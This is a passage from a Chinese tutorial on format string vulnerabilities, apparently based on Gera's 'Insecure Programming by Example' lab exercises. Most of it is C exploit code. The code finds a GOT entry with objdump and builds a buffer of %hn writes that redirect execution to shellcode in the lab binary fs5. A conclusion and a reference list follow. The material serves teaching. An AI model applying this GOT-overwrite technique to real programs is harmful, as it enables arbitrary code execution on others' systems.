非安全编程演示之格式化字符串(2)
2006-04-02 20:26:42 来源:WEB开发网
if(i == 30) {
printf("Can't find our format string in stack.\n");
printf("Some padding may be needed. Aborting...\n");
exit(1);
}
sprintf(temp_buffer, "%s -R %s | %s deregister", OBJDUMP, VICTIM,
GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%08x", &deregister_address) != 1) {
pclose(f);
printf("Error: Cannot find deregister address in GOT!\n");
exit(1);
}
pclose(f);
printf("_deregister address in GOT is: 0x%08x\n",
deregister_address);
printf("shellcode address in stack is: 0x%08x\n\n", ret);
first_half = (ret & 0xffff0000) >> 16;
second_half= (ret & 0x0000ffff);
/* Evil buffer construction */
p = evil_buffer;
bzero(p, sizeof(evil_buffer));
/* first_half*/
*((void **)p) = (void *) (deregister_address + 2);
p += 4;
/* second_half */
*((void **)p) = (void *) (deregister_address);
p += 4;
sprintf(p, "%%.%ud%%%d$hn""%%.%ud%%%d$hn", first_half - 8, i + 1,
second_half - first_half, i + 2);
execle("/home/user/gera/fs5", "fs5", evil_buffer, NULL, env);
}
结论
Format strings 漏洞比较容易发现(相对而言缓冲区溢出有时候比较难发现,即便很仔细的检查了源代码)。自动检测工具检测代码中存在的漏洞通常是有用的。那么,为什么format strings漏洞被认为具有很大的威胁呢?原因在于它被引起重视的时间比较晚---直到2000。由于程序员一时偷懒,在很多旧的守护进程和应用程序中存在大量的format string bug。格式化字符串漏洞在将来不可避免的将带来很多安全问题。
参考
1. Gera, “Insecure Programming by Example”
http://community.core-sdi.com/~gera/InsecureProgramming/
2. scut, “Exploiting Format String Vulnerabilities”
http://www.team-teso.net/releases/formatstring-1.2.tar.gz
3. Aleph One, “Smashing The Stack For Fun and Profit”
http://www.phrack.com/phrack/49/P49-14
4. Linux Programmer's Manual, snprintf() function
http://www.die.net/doc/linux/man/man3/snprintf.3.html
5. Core Security Team, “Vulnerabilities
in your code – Advanced Buffer Overflows”
http://www.core-sec.com/examples/core_vulnerabilities.pdf
更多精彩
赞助商链接